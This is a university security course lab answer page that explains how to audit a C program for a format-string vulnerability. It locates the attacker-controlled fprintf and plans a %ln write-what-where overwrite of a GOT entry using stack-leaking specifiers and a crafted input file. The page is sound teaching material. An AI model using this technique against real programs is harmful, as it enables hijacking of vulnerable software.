University of Minnesota
Development of Secure Software Systems
index.php

CSci 4271 Lab 7: auditing answers

Which location to attack, source of the format string

There are 36 calls to either printf, fprintf, or snprintf in this program. But most of them can be immediately set aside for format string injection, because their format strings (the first argument for printf, the second argument for fprintf, or the third argument to snprintf) are constant strings. If a format string is a constant, there is no way for an attacker to control it. There are two calls to fprintf that you should look more closely at (these would have been pointed out if we hadn't suggested you disabled the compiler warnings about format strings). These are on line 157 where the format string is a function parameter named enoent_msg, and one on line 500 where it is a global variable named message.

To distinguish which of the dangerous-looking locations is really subject to attack, you need to look at where in the program their format string arguments are coming from; you also need this information to carry out an attack. The call on line 157 turns out not to be exploitable, because if you look at the callsites of the chdir_or_die function, the enoent_msg parameter is passed a constant string as an argument in all cases. (In some cases the argument is a concatenation of a string constant with a preprocessor macro defined to be another constant, but this concatenation happens at compilation time and neither part can be controlled by an attacker.)

By contrast, the global variable message does turn out to be controllable by an attacker. It starts out as a null pointer, and the fprintf call doesn't happen if it stays null. But on lines 92-97 you can see that if a -m flag is supplied to the program on the command line, the next word on the command line becomes the value of message. The output of the fprintf call goes to a log file rather than to the standard output, but you can check your understanding by trying different values of the -m command-line option and seeing how they are reflected in the log file. In particular you should see that format specifiers in the option value are interpreted, which is the indicator of format-string injection.

Attacker-controlled stack contents

In addition to the format string, the other thing that an attacker must be able to influence for a format string attack is a value that the printf-family function will interpret as one of its arguments, specifically the one corresponding to the %n format specifier. In some cases this could be one of the subsequent program-supplied arguments, but in this case there aren't any, so it needs to be a different value from the stack. Recall that even though arguments on x86-64 are usually passed in registers, functions like printf copy their arguments into an array in their stack frame to be able to iterate over them, and if the attacker supplies more format specifiers that the program passed arguments, the function will read past the end of this array and interpret other values from older parts of the stack as arguments corresponding to function parameters. In this program, the vulnerable call to fprintf is in main, so the relevant locations are the contents of main's stack frame, such as local variables, and beyond that the startup state of the program like command-line arguments and environment variables. The one that is most convenient for an attacker to control here is the locale variable header, which the program reads directly from the first four bytes of the file being "printed", followed by four zero bytes.

Because header is part of main's stack frame, it is not too far above where fprintf would normally expect its arguments. If you add enough %016lx specifiers, you should see that one of them is printing a 64-bit value where the high four bytes are 0, and the low four bytes are the first four bytes of the input file (because x86-64 is little-endian, the bytes from the file are actually the ones at the lower addresses in memory, and when printed as a number they are backwards from the order they appear as bytes in the file). Keep track of this format specifier, because it's the one you'll need to replace with %ln.

To control this value which is the "where" of our write-what-where attack, we need to create a file whose contents are the address of the thing we want to overwrite, the GOT entry for fclose at 0x405060. You can use any of your favorite ways of creating a file with binary data:

% perl -e 'print "\x60\x50\x40\x00"' >got-addr.in
% hd got-addr.in
00000000  60 50 40 00                                       |`P@.|
00000004

(In fact, because the values 0x60, 0x50, and 0x40 are all printable, in this case you could also make a working file just with echo -n.) You should be able to confirm by using this as the input file and with your stack-dumping format string that the value we're trying to control changes to 0000000000405060.